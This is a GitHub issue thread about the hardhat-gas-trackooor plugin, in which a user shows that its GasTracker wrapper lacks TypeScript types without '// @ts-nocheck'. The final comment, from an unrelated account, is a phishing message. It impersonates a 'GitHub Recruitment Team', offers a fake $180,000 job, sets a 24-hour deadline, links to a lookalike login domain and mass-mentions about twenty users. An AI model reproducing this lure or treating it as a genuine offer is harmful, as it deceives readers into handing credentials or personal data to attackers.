### ISSUE TITLE
It does not work

### ISSUE THREAD

**Issue by ddnexus** [d3or/hardhat-gas-trackooor#1]
Even with your own Greeter example, the resulting object does not have any of its original properties.

`TS2339: Property 'setGreeting' does not exist on type 'GasTracker'.`

**Comment by d3or** [comment]
Please provide more information about your issue, and make sure you are requiring the library in `hardhat.config.ts`. The greeter example does work. 
<img width="1155" alt="image" src="https://user-images.githubusercontent.com/97639237/172205921-e90aac83-b46b-4a0f-ac40-3eb18983963a.png">

**Comment by ddnexus** [comment]
Oh well... the greeter example does work since you added a nice `// @ts-nocheck` at the top. 
Here is what happens if you remove it:

```
An unexpected error occurred:

test/tries/greeter-test.ts:3:10 - error TS6133: 'assert' is declared but its value is never read.

3 import { assert, expect } from "chai";
           ~~~~~~
test/tries/greeter-test.ts:4:18 - error TS6133: 'waffle' is declared but its value is never read.

4 import { ethers, waffle } from "hardhat";
                   ~~~~~~
test/tries/greeter-test.ts:9:29 - error TS2304: Cannot find name 'GasTracker'.

9         const greeter = new GasTracker(await Greeter.deploy("Hello, world!"), {
                              ~~~~~~~~~~

 ELIFECYCLE  Command failed with exit code 1.

Process finished with exit code 1
```

The first 2 problems are just for maximum strictness in my tsconfig and are easily fixable, but the 3rd one is a real problem: `test/tries/greeter-test.ts:9:29 - error TS2304: Cannot find name 'GasTracker'.` That means that the plugin is not properly setup to make hardhat/typescript find the types in the plugin.

If you mean that the user have to use `// @ts-nocheck` in their test, effectively removing all the value of typescript in order to use the plugin, then, sorry, but it actually does not work for me. And I guess that it does not work for most users, because I cannot even imagine how sloppy it would be to deal with solidity without typescript.

If you could add the proper types, it would be a quite useful plugin, and a possible detail oriented alternative to `hardhat-gas-reporter`.

**Comment by mepcovenkat97** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
e1block, @kiruxaspb, @rohitverse, @DavidIsa, @sanu-k-s, @vantwoutmaarten, @dguido, @mcabrams, @alamin-php, @Skitzzy, @GenerousDev, @MistApproach, @vplasencia, @scherroman, @normful, @loktioncode, @gklein, @mahsheikhdir, @RejoiceW, @lljxx1
